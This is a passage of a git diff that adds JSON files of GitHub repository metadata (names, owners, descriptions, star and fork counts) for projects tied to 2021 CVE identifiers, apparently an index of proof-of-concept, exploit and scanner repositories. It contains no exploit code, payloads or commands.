"2022-11-09T18:13:09Z", + "pushed_at": "2021-08-02T13:52:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 392648426, + "name": "SeriousSam", + "full_name": "shaktavist\/SeriousSam", + "owner": { + "login": "shaktavist", + "id": 87278238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87278238?v=4", + "html_url": "https:\/\/github.com\/shaktavist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaktavist\/SeriousSam", + "description": "Windows Elevation of Privilege Vulnerability CVE-2021-36934", + "fork": false, + "created_at": "2021-08-04T10:37:41Z", + "updated_at": "2021-08-04T10:47:55Z", + "pushed_at": "2021-08-04T10:47:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 394763090, + "name": "CVE-2021-36934-export-shadow-volume-POC", + "full_name": "OlivierLaflamme\/CVE-2021-36934-export-shadow-volume-POC", + "owner": { + "login": "OlivierLaflamme", + "id": 25066959, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25066959?v=4", + "html_url": "https:\/\/github.com\/OlivierLaflamme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OlivierLaflamme\/CVE-2021-36934-export-shadow-volume-POC", + "description": null, + "fork": false, + "created_at": "2021-08-10T19:39:28Z", + "updated_at": "2021-09-20T04:02:17Z", + "pushed_at": "2021-08-10T19:43:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 395403990, + "name": "oxide_hive", + "full_name": "chron1k\/oxide_hive", + "owner": { + "login": "chron1k", + "id": 88612701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88612701?v=4", + "html_url": "https:\/\/github.com\/chron1k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chron1k\/oxide_hive", + "description": "Exploit for CVE-2021-36934", + "fork": false, + "created_at": "2021-08-12T18:01:21Z", + "updated_at": "2024-05-02T12:50:50Z", + "pushed_at": "2022-05-01T09:47:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-36934", + "cybersecurity", + "exploit", + "rust", + "security", + "windows" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36949.json b/2021/CVE-2021-36949.json new file mode 100644 index 0000000000..dcf9ae6a39 --- /dev/null +++ b/2021/CVE-2021-36949.json @@ -0,0 +1,33 @@ +[ + { + "id": 396130351, + "name": "Check-AAD-Connect-for-CVE-2021-36949-vulnerability", + "full_name": "Maxwitat\/Check-AAD-Connect-for-CVE-2021-36949-vulnerability", + "owner": { + "login": "Maxwitat", + "id": 18595261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18595261?v=4", + "html_url": "https:\/\/github.com\/Maxwitat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maxwitat\/Check-AAD-Connect-for-CVE-2021-36949-vulnerability", + "description": "check if Azure AD Connect is affected by the vulnerability described in CVE-2021-36949", + "fork": false, + "created_at": "2021-08-14T21:05:30Z", + "updated_at": "2024-02-21T11:45:54Z", + "pushed_at": "2021-08-15T18:39:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36955.json b/2021/CVE-2021-36955.json new file mode 100644 index 0000000000..2d2ec1f88a --- /dev/null +++ b/2021/CVE-2021-36955.json @@ -0,0 +1,33 @@ +[ + { + "id": 515072694, + "name": "CVE-2021-36955-EXP", + "full_name": "JiaJinRong12138\/CVE-2021-36955-EXP", + "owner": { + "login": "JiaJinRong12138", + "id": 45488822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45488822?v=4", + "html_url": "https:\/\/github.com\/JiaJinRong12138", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JiaJinRong12138\/CVE-2021-36955-EXP", + "description": "CVE-2021-36955", + "fork": false, + "created_at": "2022-07-18T07:08:56Z", + "updated_at": "2024-11-09T00:56:23Z", + "pushed_at": "2023-08-15T15:42:39Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-36981.json b/2021/CVE-2021-36981.json new file mode 100644 index 0000000000..8641b8625a --- /dev/null +++ b/2021/CVE-2021-36981.json @@ -0,0 +1,33 @@ +[ + { + "id": 483644661, + "name": "CVE-2021-36981", + "full_name": "0xBrAinsTorM\/CVE-2021-36981", + "owner": { + "login": "0xBrAinsTorM", + "id": 26419565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26419565?v=4", + "html_url": "https:\/\/github.com\/0xBrAinsTorM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xBrAinsTorM\/CVE-2021-36981", + "description": null, + "fork": false, + "created_at": "2022-04-20T12:26:24Z", + "updated_at": "2022-05-05T09:18:01Z", + "pushed_at": "2022-05-05T12:18:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3707.json b/2021/CVE-2021-3707.json new file mode 100644 index 0000000000..678be36de9 --- /dev/null +++ b/2021/CVE-2021-3707.json @@ -0,0 +1,36 @@ +[ + { + "id": 371966757, + "name": "DSL-2750U-Full-chain", + "full_name": "HadiMed\/DSL-2750U-Full-chain", + "owner": { + "login": "HadiMed", + "id": 57273771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57273771?v=4", + "html_url": "https:\/\/github.com\/HadiMed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadiMed\/DSL-2750U-Full-chain", + "description": "CVE-2021-3707 , CVE-2021-3708", + "fork": false, + "created_at": "2021-05-29T12:24:04Z", + "updated_at": "2024-11-21T01:02:51Z", + "pushed_at": "2022-01-21T17:30:09Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3707", + "cve-2021-3708" + ], + "visibility": "public", + "forks": 7, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37152.json b/2021/CVE-2021-37152.json new file mode 100644 index 0000000000..26e27a4c1f --- /dev/null +++ b/2021/CVE-2021-37152.json @@ -0,0 +1,33 @@ +[ + { + "id": 408041781, + "name": "CVE-2021-37152", + "full_name": "SecurityAnalysts\/CVE-2021-37152", + "owner": { + "login": "SecurityAnalysts", + "id": 26019141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26019141?v=4", + "html_url": "https:\/\/github.com\/SecurityAnalysts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecurityAnalysts\/CVE-2021-37152", + "description": "Exploit Accsess network clients by sending packets in wirless TP-LINK and preparing for a mitm attack", + "fork": false, + "created_at": "2021-09-19T05:37:37Z", + "updated_at": "2021-10-27T16:54:04Z", + "pushed_at": "2021-07-26T08:37:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3749.json b/2021/CVE-2021-3749.json new file mode 100644 index 0000000000..a04a7428ad --- /dev/null +++ b/2021/CVE-2021-3749.json @@ -0,0 +1,33 @@ +[ + { + "id": 502506261, + "name": "axios-redos", + "full_name": "T-Guerrero\/axios-redos", + "owner": { + "login": "T-Guerrero", + "id": 54722457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54722457?v=4", + "html_url": "https:\/\/github.com\/T-Guerrero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T-Guerrero\/axios-redos", + "description": "Axios Redos (CVE-2021-3749) proof of concept", + "fork": false, + "created_at": "2022-06-12T03:06:45Z", + "updated_at": "2022-06-12T03:39:48Z", + "pushed_at": "2022-07-07T02:49:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3754.json b/2021/CVE-2021-3754.json new file mode 100644 index 0000000000..9adec125a9 --- /dev/null +++ b/2021/CVE-2021-3754.json @@ -0,0 +1,53 @@ +[ + { + "id": 688367174, + "name": "CVE-2021-3754", + "full_name": "7Ragnarok7\/CVE-2021-3754", + "owner": { + "login": "7Ragnarok7", + "id": 35977703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35977703?v=4", + "html_url": "https:\/\/github.com\/7Ragnarok7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7Ragnarok7\/CVE-2021-3754", + "description": "Vulnerability details and exploit for CVE-2021-3754", + "fork": false, + "created_at": "2023-09-07T07:49:21Z", + "updated_at": "2024-06-22T04:47:02Z", + "pushed_at": "2024-06-22T04:46:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "7ragnarok7", + "apache", + "cve", + "cve-2021-3754", + "cvss", + "cybersecurity", + "exploit", + "exploitation", + "hack", + "hacking", + "keycloak", + "nist", + "nsd", + "nvd", + "redhat", + "security", + "sso", + "sso-authentication", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37580.json b/2021/CVE-2021-37580.json new file mode 100644 index 0000000000..17d3fc7fb1 --- /dev/null +++ b/2021/CVE-2021-37580.json @@ -0,0 +1,219 @@ +[ + { + "id": 428966283, + "name": "CVE-2021-37580", + "full_name": "rabbitsafe\/CVE-2021-37580", + "owner": { + "login": "rabbitsafe", + "id": 33046073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4", + "html_url": "https:\/\/github.com\/rabbitsafe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-37580", + "description": null, + "fork": false, + "created_at": "2021-11-17T08:33:25Z", + "updated_at": "2024-05-20T09:43:59Z", + "pushed_at": "2021-11-18T04:41:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429055913, + "name": "CVE-2021-37580", + "full_name": "fengwenhua\/CVE-2021-37580", + "owner": { + "login": "fengwenhua", + "id": 26518808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26518808?v=4", + "html_url": "https:\/\/github.com\/fengwenhua", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengwenhua\/CVE-2021-37580", + "description": "CVE-2021-37580的poc", + "fork": false, + "created_at": "2021-11-17T13:26:46Z", + "updated_at": "2024-08-12T20:18:10Z", + "pushed_at": "2023-06-18T01:19:09Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429697308, + "name": "westone-CVE-2021-37580-scanner", + "full_name": "Osyanina\/westone-CVE-2021-37580-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-37580-scanner", + "description": "A vulnerability scanner that detects CVE-2021-37580 vulnerabilities.", + "fork": false, + "created_at": "2021-11-19T06:49:35Z", + "updated_at": "2021-11-19T06:54:08Z", + "pushed_at": "2021-11-19T06:54:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429720874, + "name": "CVE-2021-37580", + "full_name": "ZororoZ\/CVE-2021-37580", + "owner": { + "login": "ZororoZ", + "id": 46238787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46238787?v=4", + "html_url": "https:\/\/github.com\/ZororoZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZororoZ\/CVE-2021-37580", + "description": null, + "fork": false, + "created_at": "2021-11-19T08:21:44Z", + "updated_at": "2024-08-12T20:18:12Z", + "pushed_at": "2021-11-19T08:44:37Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 429731870, + "name": "CVE-2021-37580", + "full_name": "Liang2580\/CVE-2021-37580", + "owner": { + "login": "Liang2580", + "id": 27684409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27684409?v=4", + "html_url": "https:\/\/github.com\/Liang2580", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Liang2580\/CVE-2021-37580", + "description": "CVE-2021-37580", + "fork": false, + "created_at": "2021-11-19T09:00:37Z", + "updated_at": "2024-08-12T20:18:12Z", + "pushed_at": "2021-11-19T09:03:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 429816997, + "name": "CVE-2021-37580", + "full_name": "Wing-song\/CVE-2021-37580", + "owner": { + "login": "Wing-song", + "id": 40231286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40231286?v=4", + "html_url": "https:\/\/github.com\/Wing-song", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wing-song\/CVE-2021-37580", + "description": " Apache ShenYu 管理员认证绕过 ", + "fork": false, + "created_at": "2021-11-19T13:59:26Z", + "updated_at": "2021-11-19T15:23:18Z", + "pushed_at": "2021-11-19T15:23:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702911359, + "name": "Apache-ShenYu-Admin-JWT-CVE-2021-37580-", + "full_name": "CN016\/Apache-ShenYu-Admin-JWT-CVE-2021-37580-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Apache-ShenYu-Admin-JWT-CVE-2021-37580-", + "description": "Apache ShenYu Admin JWT认证绕过漏洞(CVE-2021-37580)", + "fork": false, + "created_at": "2023-10-10T08:41:54Z", + "updated_at": "2024-04-22T11:29:18Z", + "pushed_at": "2023-10-10T08:43:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37624.json b/2021/CVE-2021-37624.json new file mode 100644 index 0000000000..c90f43c051 --- /dev/null +++ b/2021/CVE-2021-37624.json @@ -0,0 +1,40 @@ +[ + { + "id": 432716321, + "name": "PewSWITCH", + "full_name": "0xInfection\/PewSWITCH", + "owner": { + "login": "0xInfection", + "id": 39941993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39941993?v=4", + "html_url": "https:\/\/github.com\/0xInfection", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xInfection\/PewSWITCH", + "description": "A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.", + "fork": false, + "created_at": "2021-11-28T13:12:38Z", + "updated_at": "2024-10-03T05:15:56Z", + "pushed_at": "2021-12-05T16:54:16Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploitation-framework", + "freeswitch", + "security", + "sip-security", + "unauthenticated-requests", + "voip-telephony-providers" + ], + "visibility": "public", + "forks": 10, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37678.json b/2021/CVE-2021-37678.json new file mode 100644 index 0000000000..a45912337b --- /dev/null +++ b/2021/CVE-2021-37678.json @@ -0,0 +1,33 @@ +[ + { + "id": 404721741, + "name": "ExploitTensorflowCVE-2021-37678", + "full_name": "fran-CICS\/ExploitTensorflowCVE-2021-37678", + "owner": { + "login": "fran-CICS", + "id": 11778309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11778309?v=4", + "html_url": "https:\/\/github.com\/fran-CICS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fran-CICS\/ExploitTensorflowCVE-2021-37678", + "description": "TP Seguridad Informática UTN FRBA 2021", + "fork": false, + "created_at": "2021-09-09T12:55:55Z", + "updated_at": "2024-09-11T03:36:41Z", + "pushed_at": "2021-11-06T02:59:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3773.json b/2021/CVE-2021-3773.json new file mode 100644 index 0000000000..e5d190f8ce --- /dev/null +++ b/2021/CVE-2021-3773.json @@ -0,0 +1,33 @@ +[ + { + "id": 830375077, + "name": "CVE-2021-3773", + "full_name": "d0rb\/CVE-2021-3773", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2021-3773", + "description": "This script exploits the \"Port Shadow\" vulnerability (CVE-2021-3773) in OpenVPN servers using Netfilter for NAT.", + "fork": false, + "created_at": "2024-07-18T06:43:12Z", + "updated_at": "2024-07-18T06:54:23Z", + "pushed_at": "2024-07-18T06:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37740.json b/2021/CVE-2021-37740.json new file mode 100644 index 0000000000..5878c286bd --- /dev/null +++ b/2021/CVE-2021-37740.json @@ -0,0 +1,38 @@ +[ + { + "id": 476823243, + "name": "CVE-2021-37740", + "full_name": "robertguetzkow\/CVE-2021-37740", + "owner": { + "login": "robertguetzkow", + "id": 25986807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25986807?v=4", + "html_url": "https:\/\/github.com\/robertguetzkow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertguetzkow\/CVE-2021-37740", + "description": "PoC for DoS vulnerability CVE-2021-37740 in firmware v3.0.3 of SCN-IP100.03 and SCN-IP000.03 by MDT. The bug has been fixed in firmware v3.0.4.", + "fork": false, + "created_at": "2022-04-01T18:07:42Z", + "updated_at": "2024-08-12T20:22:04Z", + "pushed_at": "2022-07-22T17:16:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "denial-of-service", + "poc", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37748.json b/2021/CVE-2021-37748.json new file mode 100644 index 0000000000..1c2b32d15f --- /dev/null +++ b/2021/CVE-2021-37748.json @@ -0,0 +1,33 @@ +[ + { + "id": 421010663, + "name": "CVE-2021-37748", + "full_name": "SECFORCE\/CVE-2021-37748", + "owner": { + "login": "SECFORCE", + "id": 8157384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2021-37748", + "description": null, + "fork": false, + "created_at": "2021-10-25T12:16:41Z", + "updated_at": "2024-09-02T03:39:25Z", + "pushed_at": "2021-10-25T12:57:55Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37832.json b/2021/CVE-2021-37832.json new file mode 100644 index 0000000000..072ef25701 --- /dev/null +++ b/2021/CVE-2021-37832.json @@ -0,0 +1,64 @@ +[ + { + "id": 391489574, + "name": "CVE-2021-37832", + "full_name": "dievus\/CVE-2021-37832", + "owner": { + "login": "dievus", + "id": 25853389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4", + "html_url": "https:\/\/github.com\/dievus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dievus\/CVE-2021-37832", + "description": "CVE-2021-37832 - Hotel Druid 3.0.2 SQL Injection Vulnerability - 9.8 CVSS 3.1", + "fork": false, + "created_at": "2021-08-01T00:38:56Z", + "updated_at": "2024-08-12T20:15:10Z", + "pushed_at": "2021-08-12T00:09:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 434506274, + "name": "CVE-2021-37832", + "full_name": "AK-blank\/CVE-2021-37832", + "owner": { + "login": "AK-blank", + "id": 56591429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4", + "html_url": "https:\/\/github.com\/AK-blank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-37832", + "description": "CVE 2021-37832 poc", + "fork": false, + "created_at": "2021-12-03T07:35:02Z", + "updated_at": "2021-12-05T06:19:08Z", + "pushed_at": "2021-12-03T07:54:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37833.json b/2021/CVE-2021-37833.json new file mode 100644 index 0000000000..9a28a765bb --- /dev/null +++ b/2021/CVE-2021-37833.json @@ -0,0 +1,33 @@ +[ + { + "id": 391489074, + "name": "CVE-2021-37833", + "full_name": "dievus\/CVE-2021-37833", + "owner": { + "login": "dievus", + "id": 25853389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4", + "html_url": "https:\/\/github.com\/dievus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dievus\/CVE-2021-37833", + "description": "CVE 2021-37833 Hotel Druid 3.0.2 Reflected Cross Site Scripting", + "fork": false, + "created_at": "2021-08-01T00:34:27Z", + "updated_at": "2024-08-12T20:15:10Z", + "pushed_at": "2021-08-03T13:44:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37910.json b/2021/CVE-2021-37910.json new file mode 100644 index 0000000000..cd47d76e1e --- /dev/null +++ b/2021/CVE-2021-37910.json @@ -0,0 +1,33 @@ +[ + { + "id": 497138927, + "name": "easy-exploits", + "full_name": "efchatz\/easy-exploits", + "owner": { + "login": "efchatz", + "id": 43434138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4", + "html_url": "https:\/\/github.com\/efchatz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efchatz\/easy-exploits", + "description": "Exploits of different CVE IDs (CVE-2021-37910, CVE-2021-40288, CVE-2021-41435, CVE-2021-41436, CVE-2021-41437, CVE-2021-41441, CVE-2021-41442, CVE-2021-41445, CVE-2021-41449, CVE-2021-41450, CVE-2021-41451, CVE-2021-41753, CVE-2021-41788, CVE-2021-46353, CVE-2022-41540, CVE-2022-41541)", + "fork": false, + "created_at": "2022-05-27T21:09:03Z", + "updated_at": "2024-09-17T07:27:43Z", + "pushed_at": "2022-10-19T21:24:35Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37975.json b/2021/CVE-2021-37975.json new file mode 100644 index 0000000000..77e66cc802 --- /dev/null +++ b/2021/CVE-2021-37975.json @@ -0,0 +1,33 @@ +[ + { + "id": 446380998, + "name": "CVE-2021-37975", + "full_name": "ssaroussi\/CVE-2021-37975", + "owner": { + "login": "ssaroussi", + "id": 19860280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19860280?v=4", + "html_url": "https:\/\/github.com\/ssaroussi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssaroussi\/CVE-2021-37975", + "description": "Playground for the exploitation process", + "fork": false, + "created_at": "2022-01-10T10:41:00Z", + "updated_at": "2024-06-19T23:58:57Z", + "pushed_at": "2022-02-06T20:02:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-37980.json b/2021/CVE-2021-37980.json new file mode 100644 index 0000000000..2cbf8ea7a2 --- /dev/null +++ b/2021/CVE-2021-37980.json @@ -0,0 +1,33 @@ +[ + { + "id": 416466988, + "name": "CVE-2021-37980", + "full_name": "ZeusBox\/CVE-2021-37980", + "owner": { + "login": "ZeusBox", + "id": 78951067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78951067?v=4", + "html_url": "https:\/\/github.com\/ZeusBox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZeusBox\/CVE-2021-37980", + "description": "PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only)", + "fork": false, + "created_at": "2021-10-12T19:14:29Z", + "updated_at": "2024-10-15T07:32:20Z", + "pushed_at": "2021-10-14T19:54:12Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 71, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38001.json b/2021/CVE-2021-38001.json new file mode 100644 index 0000000000..05f6457c72 --- /dev/null +++ b/2021/CVE-2021-38001.json @@ -0,0 +1,64 @@ +[ + { + "id": 424810404, + "name": "TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "full_name": 